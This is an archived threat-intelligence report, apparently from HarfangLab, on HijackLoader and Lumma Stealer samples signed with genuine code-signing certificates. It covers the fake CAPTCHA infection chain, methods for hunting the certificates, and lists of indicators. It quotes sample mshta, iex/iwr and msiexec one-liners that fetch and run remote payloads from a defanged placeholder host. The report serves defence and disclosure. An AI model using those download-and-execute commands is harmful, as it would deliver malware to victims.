{
	"id": "5358bc4a-32fa-495c-9bf9-155d1b2b8ca0",
	"created_at": "2026-04-06T00:20:16.417685Z",
	"updated_at": "2026-04-10T13:11:37.994641Z",
	"deleted_at": null,
	"sha1_hash": "53286663e5a9ac3c4b8c691ba6272ce588b2416f",
	"title": "HijackLoader evolution: abusing genuine signing certificates",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1156817,
	"plain_text": "HijackLoader evolution: abusing genuine signing certificates\r\nPublished: 2024-10-11 · Archived: 2026-04-05 14:49:41 UTC\r\nPublished on 11 October, 2024 16min\r\nSummary\r\nhttps://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\r\nPage 1 of 13\n\nSince mid-September 2024, our telemetry has revealed a significant increase in “Lumma Stealer”1\r\n malware\r\ndeployments via the “HijackLoader”2 malicious loader.\r\nOn October 2, 2024, HarfangLab EDR detected and blocked yet another HijackLoader deployment attempt –\r\nexcept this time, the malware sample was properly signed with a genuine code-signing certificate.\r\nIn response, we initiated a hunt for code-signing certificates (ab)used to sign malware samples. We identified and\r\nreported more of such certificates. This report briefly presents the associated stealer threat, outlines the\r\nmethodology for hunting these certificates, and providees indicators of compromise.\r\nHijackLoader deployment workflow\r\nInfection chain: the fake CAPTCHA campaign\r\nThe so-called “fake CAPTCHA” campaign has already been extensively documented3. The overall deployment\r\ntactic is unfolded as follows:\r\nFigure 1 – Infection chain overview\r\n1) The target visits a malicious website showing a fake CAPTCHA Web page:\r\nhttps://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\r\nPage 2 of 13\n\nFigure 2 – Fake CAPTCHA Web page\r\n2) Upon clicking the “I’m not a robot” button, a pop-up invites targets to type a series of keyboard shortcuts so\r\nthey open a command line interpreter, paste and execute a PowerShell payload (which has been automatically\r\ncopied in the clipboard):\r\nFigure 3 – Path to PowerShell execution\r\n3) As a result of the PowerShell execution, a ZIP archive is downloaded, decompressed and a binary is executed\r\nfrom it.\r\nStarting mid-September 2024, we could identify in our telemetry 3 variants of the PowerShell script which is used\r\nduring the second step:\r\nUse of mshta.exe\r\n4\r\n: The script leverages the Microsoft HTML Application Host to execute malicious\r\ncode from a remote URL. Arbitrary example: mshta hxxps://payload[.]url/tra17\r\nhttps://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\r\nPage 3 of 13\n\nRaw PowerShell with iex (Invoke-Expression)5\r\n. In this variant, a PowerShell script is directly executed\r\nfrom a remote file. Arbitrary example: iex (iwr hxxps://payload[.]url/a.txt -\r\nUseBasicParsing).Content\r\nUse of msiexec.exe\r\n6\r\n: The script also employs the Microsoft Windows Installer to silently download and\r\nexecute a payload from a remote URL. Arbitrary example: C:\\windows\\system32\\msiexec.exe /fv\r\nhxxps://payload[.]url/DB2jh /q\r\nHijackLoader execution from DLL sideloading\r\nThe initial ZIP archive samples we analyzed from the aforementioned infection chain contained a DLL\r\nsideloading7 package, which led to HijackLoader execution. This package consists of three components:\r\n1. A legitimate application binary;\r\n2. A malicious sideloaded DLL;\r\n3. An optional additional data file.\r\nFigure 4 – HijackLoader and DLL sideloading\r\nFor most DLL sideloading packages we analyzed, the purpose of the sideloaded HijackLoader DLL is to decrypt\r\nand execute an encrypted file which is provided in the package. This file conceals the final HijackLoader stage,\r\nwhich is aimed at downloading and executing a stealer implant (Lumma Stealer in our cases).\r\nA wild signed HijackLoader appears!\r\nOn October 2, 2024, HarfangLab EDR detected and blocked a HijackLoader deployment attempt against a\r\ncustomer. We noticed that the executable which triggered the detection (SHA-256:\r\n1839b7152814b16b9f28326081f16bf9c5bbbb380005232c92d25c9a3e36e337 ) was a signed8\r\n HijackLoader sample,\r\nand was not part of a DLL sideloading package:\r\nhttps://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\r\nPage 4 of 13\n\nFigure 5 – Signed HijackLoader detection\r\nWhen the malicious attempt was detected by HarfangLab EDR and for at least 2 days, the signed HijackLoader\r\nsample was very poorly detected by security products:\r\nFigure 6 – Detection of the signed HijackLoader according to a popular online multiscanner on\r\n2024-10-03 at midnight\r\nThe associated code-signing certificate has been revoked between October 3 and 4. Malicious executables that are\r\nsigned with this certificate are now properly detected by most security products.\r\nBesides the HijackLoader deployment tactic being switched from a DLL sideloading package to a signed binary,\r\nthe sample execution logic remains the same, and has been publicly described in several articles91011 already. The\r\nhttps://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\r\nPage 5 of 13\n\ncommand and control12\r\n hostname for the signed sample we initially detected (SHA-256:\r\n1839b7152814b16b9f28326081f16bf9c5bbbb380005232c92d25c9a3e36e337 ) is me3ar40.quickworld[.]shop (see\r\nFig. 7).\r\nFigure 7 – HijackLoader C2 hostname\r\nSigned malware samples seem to evade traditional detection methods rather well. For instance, the capture below\r\nshows the poor detection rate for another HijackLoader sample (SHA-256\r\nf158c65261bcab6e93927a219d12f596a4e40857bbd379f9889710ea17251e5e ) we identified, and which is\r\nimpersonating the “Firefox” browser:\r\nFigure 8 – Poor detection rate for a signed HijackLoader sample on 2024-10-09\r\nAs a result, we tried to pivot from the HijackLoader occurence we detected to identify further abused code-signing\r\ncertificates.\r\nHunting for more abused code-signing certificates\r\nPivoting from a C2 hostname\r\nIn order to hunt for more abused code-signing certificates, we first looked for signed executables which accessed a\r\nURL on a known HijackLoader sample C2 ( quickworld.shop ):\r\nhttps://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\r\nPage 6 of 13\n\nFigure 9 – Signed malware using the same C2 domain\r\nDoing so, we could identify new signed malicious samples, and the abuse of the 2 following code-signing\r\ncertificates:\r\nName: Lider LLC\r\nValid From: 01:58 PM 06/14/2024\r\nValid To: 01:58 PM 06/15/2025\r\nThumbprint: 2DD67214D7C7274458CFECC78E4B51063869D8E3\r\nSerial Number: 39 DF 1C 6C 0F 51 C5 9F 17 59 CA 59\r\nName: Hangzhou Rongyi Network Technology Co., Ltd.\r\nValid From: 07:50 AM 09/27/2024\r\nValid To: 07:50 AM 09/27/2025\r\nThumbprint: DCC865C6DD9EA2318439F207ACBC2AC0797FB51B\r\nSerial Number: 16 16 F1 4F BA 9C 87 AB 97 AD 25 86 1E E7 A9 DC\r\nhttps://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\r\nPage 7 of 13\n\nWe could then further identify additional samples which were signed using these certificates, confirm they were\r\nmalicious, and extract samples data (like C2 hostnames) to iterate the process with the newly identified domains:\r\nFigure 10 – Hunting for signed malware samples via domain names\r\nThanks to this technique we identified a third abused code-signing certificate.\r\nName: Shanghai Yungpu Chemical Co., Ltd.\r\nValid From: 04:20 PM 09/19/2024\r\nValid To: 08:06 AM 09/19/2025\r\nThumbprint: FDD829D3B46933EF8015B70B6C3FCE6BA9675578\r\nSerial Number: 69 1C 41 0E 33 DD F6 44 08 6F A2 41 10 7B 64 6E\r\nPivoting from samples metadata\r\nWe checked malicious binaries metadata (copyright, original name, description, etc.) and noticed that some of\r\nthem were not only reused in several malicious samples, but also copied from original legitimate software. For\r\ninstance, some malicious samples (e.g. SHA-256\r\nff946f48f6bdf33d31f39614909115fead505c16426411897bd8e48362017d31 ) impersonate metadata of the legitimate\r\n“Wise Folder Hider” tool:\r\nhttps://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\r\nPage 8 of 13\n\nFigure 11 – Executable binary metadata\r\nWe leveraged this legitimate metadata impersonation to identify more malicious samples and abused code-signing\r\ncertificates, according to the following heuristics (see Fig. 12):\r\n1. If the original legitimate software from which metadata is copied, is NOT signed; then any signed binary\r\nreusing its metadata is deemed suspicious.\r\n2. If the original legitimate software is signed; then any binary reusing its metadata but which is signed with a\r\ndifferent certificate is deemed suspicious.\r\nFigure 12 – Identifying newly signed malware via metadata\r\nWe analyzed suspicious samples to confirm they were malicious, and iterated over the previously described\r\nhunting loop from confirmed malicious samples. Doing so, we were able to identify 2 additional abused\r\ncertificates:\r\nName: LLC SEVER\r\nValid From: 07:55 AM 04/24/2024\r\nValid To: 07:55 AM 04/25/2025\r\nThumbprint: 2B20EE6FB83FF52BDD2714741A8783981795B8E7\r\nSerial Number: 6B 7A F8 E1 3E 40 98 A5 07 B6 97 8A\r\nName: Xi'an Tengyuanri Network Technology Co., Ltd.\r\nValid From: 08:18 AM 09/03/2024\r\nhttps://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\r\nPage 9 of 13\n\nValid To: 08:18 AM 09/03/2025\r\nThumbprint: 4B2459E76864532BDB1F00BF909495C96A01F93C\r\nSerial Number: 5C 70 B0 F5 7B 7D 26 ED 72 3E FF AE 43 D6 F4 71\r\nConclusion\r\nOur investigation, initiated by a HarfangLab EDR detection, led to identification of multiple abused code-signing\r\ncertificates and associated malicious samples actively used in the wild.\r\nWe reported these abused code-signing certificates to their issuing autorities, resulting in them being revoked,\r\nwithin hours up to almost a day, enabling proper detection by other security vendors.\r\nWhile we could not reliably determine whether these certificates were stolen or purposefully generated by threat\r\nactors, we assess with low to medium confidence that they were likely created deliberately. For several issuing\r\ncertificate autorities, we noticed that acquiring and activating a code-signing certificate is mostly automated, and\r\nonly requires a valid company registration number as well as a contact person.\r\nThis research underscores that malware can be signed, highlighting that code signature alone cannot serve as a\r\nbaseline indicator of trustworthiness. Therefore, it’s crucial to implement several complementary detection tactics,\r\nsuch as monitoring system behaviors and conducting in-memory scanning on endpoints, to protect against the\r\nexecution of signed malware.\r\nAppendix\r\nIndicators of compromise (IOCs)\r\nAssociated IOCs are also available on our GitHub repository.\r\nHashes (SHA-256)\r\nSamples signed by Acira Consulting Inc\r\n0d40a18d67005a5ade12b5593df3cf9e7ae996bebedacad64de81de3ffb9821a\r\n137a54acfc324a120335bd1b9a397cb5fd7e7709b0980ac3eaeb03fa7764f259\r\n17926b988b31296c26bf8fcc5be5595f8b290112949cd9314b3ddb51216a9fc6\r\n1839b7152814b16b9f28326081f16bf9c5bbbb380005232c92d25c9a3e36e337\r\n20cfcd8c67b83b282e3aac028a166539a26d44129c9860ea7464feed5a123818\r\n27ed09b6bbce8c6306640adf76d6dd1f3b97c406915d72b215165fe1c5615ac7\r\n315615abe0592af8ae3c90b6ad3b18047084612b49699a6f26eafe1dc747d773\r\n365ed11bf82a3f59768195ab7971b6955ec0ab883b5e800c63339a4105bdec95\r\n39551715b734f4a331dd0b39a953a79567f642dc38bfa173f9849a4dbdd7d34e\r\n3d2f989bf5887b1dbbfbb0030ed0e4c304dd0e6123a1e10e798ee3eb10c87f8b\r\n402aacbb8dc07d96733eee2292f709d89d65efbe82d55e0dd4b7764cdde287b5\r\n40e21047850b9645143ac1febe703de2be9b6c9dc684840bebb61b09a0725a85\r\n4be6e60d9880611a354d4c4c3097733fd7ce4812c40e7a4fc9e8fca569f329f6\r\n5c019e25c46cc13a4bc05ccacf2b783f9435bed724ae945d1508c69f3490a617\r\nhttps://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\r\nPage 10 of 13\n\n649ec4858e572e0145e35a9faa712708949b7bb1bce1594154cda580d80a0ca9\r\n6c58e8c3b998614567b4584cffc148e2382727997a754db68aa310881c2a5ba0\r\n7085f5baff8a1f39a4baf11b650aad21454eef8b0afd13f9c4338fed86b99785\r\n75da403841e014243fce87a1b666e02388c99fb96135e7c6fe5523ce2f51a5ca\r\n970f0e2741f072e9b3c0fb5059e1d5610a8b53f50be65992a210884439c5643e\r\n9ef8d1845db29a2b4dc9e912e480bfad7e8007c96b1da364a5af123df7e01c29\r\na941faec5a25db96d6258d5c1e6c30f9f18ecf9937b63eb687b4d71a0af871f0\r\nbdd338ff606d1e08ec16d13fbc5dee1e404ad2ae857a70e81bb23888beabf63a\r\nbe03aa927c5d0d61ec21af9227f48e8c4d44c696c46f275bf7510998311912e8\r\nd465588501d2882d1a223516c4f66bcc44ea7211245fd49b9e61a64f94831614\r\ne13aa5f31d2469fc4db4e54af711035ea79f63be591c0460982c0b6baf08e649\r\nfcb54e221a021ff3d57c52366169a13f86bed4c16d7e5bbddbfb6a315dc7bf3f\r\nff946f48f6bdf33d31f39614909115fead505c16426411897bd8e48362017d31\r\nSamples signed by Xi’an Tengyuanri Network Technology Co\r\nfa6e61f845c06cb9075806cfc8cb8ed7e1ca7dc956cce5eafbe99babf85d9e66\r\n7c78454c853838a863c7a112e2c726e2b98d292906c73a1fa09b03cf421a5966\r\n5fac3606d6153531218a608ae5cb3f40f2421a41b18b0d58f3f7fdb56366732d\r\n3450b57ff0d7f8cd7f14258d1e0e851487b5beac599a024f91f31c15e9deb075\r\nSamples signed by Shanghai Yungpu Chemical Co\r\nfecd6fc43e5198b7b4427c1e23cd62ca97820da25d2bdba67bd29b3d0f100fa5\r\nfad1bf61d38d750f341cdc09174af3c2d4368b19db62171bc5d7be6401eb8c00\r\nfaa45f2433a8da9a57c6a876779638fb14037d56e93ae85297fea7517be501f2\r\nf4350182d9a117138e47ce4622b3aa1ac9ebf2583f4932a6da78ea2ed7511a7f\r\nf158c65261bcab6e93927a219d12f596a4e40857bbd379f9889710ea17251e5e\r\nc78b8771a5b897c03008c09241fdb07160264858f49c7398f9db681fc2003971\r\n81755e2da9fcc33dcd423c30a0ad4f9147b54dc1880721247631b34c31071de7\r\n7d676c9ef817e55701ab3050a6bbde7d0fb8aa251c09779662c514c7f87875cc\r\n6e0c83627427e5ec9c30569a851cc72cc003ea1c7ee182db3e4dae9392285a7b\r\n6a3095d572991c4943f7a27dff4798d3b5286280115f7fab77a0a472ca0abdd9\r\n68242a96e0283db31f7a68f6e26df99e1a27fef1f1f9d732f0ddd0b8663ba3c6\r\n11a6ee07c004d8c7469a9cf30b9b084ea786613a5481fcdf78ce5a2634ad2f02\r\n04675527ea934ff3450cf20900b7233a8a86125b5f3042d97d3a6e349631f307\r\nSamples signed by LLC SEVER\r\nfa58891a232e236bfde9d6103007624f0e83e17a9377bf4ac86af4bd087270d7\r\ne02025280e22b826ab8997e2545406bf0c31e497f059155dc8412c34c8bad859\r\nd948e07325a1cf48bb9749e3f0a83d69c4abb96f822e3002b31b752ebb292c77\r\nc6e595d44257f293200b926123cea0f3cdbd622b32226758e907f9829d652833\r\nbe0644373ab939d3e3d1766927039876b4c3511258dd5ecf3cb75f1dab5ac324\r\nhttps://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\r\nPage 11 of 13\n\n8552afefa1cdcfe5889cf01bfae140e341c5bfb03188e65a45d2c8d90520e11e\r\n81fa2b7bd9d726d239b08595d1445efaa697ef45761551b966c3a3930288952d\r\n6abb9de7f6c663e542cd3d7b481b0907566f8c2acdacc6178091dacc7891d2b2\r\n5ed854b4ed07250521f0da12b810128b014b2c6e83b8ba51b80dfa9e4252a3bf\r\n34fea0c0708ecfceb592029910626ca699fb5f18595599d47a9ec87749940884\r\n315e6d1736e2ec8465a172d289a6520ec127e1b02190716b383226275672170b\r\n26ab5cf8df71135baf2661864f7d5a62262688a018f7450c5de962433c2b99c9\r\nSamples signed by Lider LLC\r\ne72b171c1383bda2f72ad0e5cdcab833d1488c143ad9386b290d44cb2d67e702\r\ne4536f1dc62b6bae30e6da53cece729820bb27891a020b6a6cf7c4fe566f15a4\r\nd022c579f3619b23b74fa31b6241feb542bf089cb52609256894da08f787d2f3\r\nc73b23798aa9785f2e593db8ced278e0c325e4cb545bb9c8f9004165bd983b6d\r\na95276bc7b7474384166232e0ebe86a5e40ed6d1cdd103794b3b5af107a3eee3\r\n5e450445b628d7c1a4c31e8bb6c951e24e0a0347660eccca6d851477462a0fd4\r\n25c2c9648b5be95c0a61f043f2a9e5703373c3831edbe8cc8b7c857b405f172a\r\n174432fd986530d149a229fa4cfbb0bfe19fc9a6a52efd405a5da02c90a7f9fd\r\nSamples signed by Hangzhou Rongyi Network Technology Co\r\nc20e98a4190f9063f9181d8d9fc01bb89e4e56cb888d4d8883c593586ff52a09\r\n7544df9edd35749e132b8f586cef88127dcbea491ab128271fc3b2abd94e01d5\r\n25e0344b3c4d17a34f59423d45c5e95015ac347e0040e51b2d5df81f3b8ceb83\r\n23a229c4b053f26ed5303447c17edf0ee6b02535692a558e158b3b03087bec87\r\n0c8f2c06eaba300751add819f419458b06acaea47b8b5983fab710a67a074873\r\n0a6df5fb902be0b4b0ed9bfb4f53df4ab54391458a7d8833d524d16d46b33f33\r\nAbused code-signing certificates details\r\nName: Lider LLC\r\nIssuer: GlobalSign GCC R45 EV CodeSigning CA 2020\r\nValid From: 01:58 PM 06/14/2024\r\nValid To: 01:58 PM 06/15/2025\r\nValid Usage: Code Signing\r\nAlgorithm: sha256RSA\r\nThumbprint: 2DD67214D7C7274458CFECC78E4B51063869D8E3\r\nSerial Number: 39 DF 1C 6C 0F 51 C5 9F 17 59 CA 59\r\nName: Hangzhou Rongyi Network Technology Co., Ltd.\r\nIssuer: Certum Extended Validation Code Signing 2021 CA\r\nValid From: 07:50 AM 09/27/2024\r\nValid To: 07:50 AM 09/27/2025\r\nValid Usage: Code Signing\r\nhttps://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\r\nPage 12 of 13\n\nAlgorithm: sha256RSA\r\nThumbprint: DCC865C6DD9EA2318439F207ACBC2AC0797FB51B\r\nSerial Number: 16 16 F1 4F BA 9C 87 AB 97 AD 25 86 1E E7 A9 DC\r\nName: Shanghai Yungpu Chemical Co., Ltd.\r\nIssuer: SSL.com EV Code Signing Intermediate CA RSA R3\r\nValid From: 04:20 PM 09/19/2024\r\nValid To: 08:06 AM 09/19/2025\r\nValid Usage: Code Signing\r\nAlgorithm: sha256RSA\r\nThumbprint: FDD829D3B46933EF8015B70B6C3FCE6BA9675578\r\nSerial Number: 69 1C 41 0E 33 DD F6 44 08 6F A2 41 10 7B 64 6E\r\nName: LLC SEVER\r\nIssuer: GlobalSign GCC R45 EV CodeSigning CA 2020\r\nValid From: 07:55 AM 04/24/2024\r\nValid To: 07:55 AM 04/25/2025\r\nValid Usage: Code Signing\r\nAlgorithm: sha256RSA\r\nThumbprint: 2B20EE6FB83FF52BDD2714741A8783981795B8E7\r\nSerial Number: 6B 7A F8 E1 3E 40 98 A5 07 B6 97 8A\r\nName: Xi'an Tengyuanri Network Technology Co., Ltd.\r\nIssuer: Certum Extended Validation Code Signing 2021 CA\r\nValid From: 08:18 AM 09/03/2024\r\nValid To: 08:18 AM 09/03/2025\r\nValid Usage: Code Signing\r\nAlgorithm: sha256RSA\r\nThumbprint: 4B2459E76864532BDB1F00BF909495C96A01F93C\r\nSerial Number: 5C 70 B0 F5 7B 7D 26 ED 72 3E FF AE 43 D6 F4 71\r\nSource: https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\r\nhttps://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\r\nPage 13 of 13\n\nValid To: 07:55 Thumbprint: 2B20EE6FB83FF52BDD2714741A8783981795B8E7 AM 04/25/2025  \nSerial Number: 6B 7A F8 E1 3E 40 98 A5 07 B6 97 8A\nName: Xi'an Tengyuanri Network Technology Co., Ltd.\nValid From: 08:18 AM 09/03/2024  \n   Page 9 of 13\n\nAlgorithm: Thumbprint: sha256RSA 2DD67214D7C7274458CFECC78E4B51063869D8E3  \nSerial Number: 39 DF 1C 6C 0F 51 C5 9F 17 59 CA 59\nName: Hangzhou Rongyi Network Technology Co., Ltd.\nIssuer: Certum Extended Validation Code Signing 2021 CA\nValid From: 07:50 AM 09/27/2024  \nValid To: 07:50 AM 09/27/2025  \nValid Usage: Code Signing  \n   Page 12 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/"
	],
	"report_names": [
		"hijackloader-abusing-genuine-certificates"
	],
	"threat_actors": [],
	"ts_created_at": 1775434816,
	"ts_updated_at": 1775826697,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/53286663e5a9ac3c4b8c691ba6272ce588b2416f.pdf",
		"text": "https://archive.orkl.eu/53286663e5a9ac3c4b8c691ba6272ce588b2416f.txt",
		"img": "https://archive.orkl.eu/53286663e5a9ac3c4b8c691ba6272ce588b2416f.jpg"
	}
}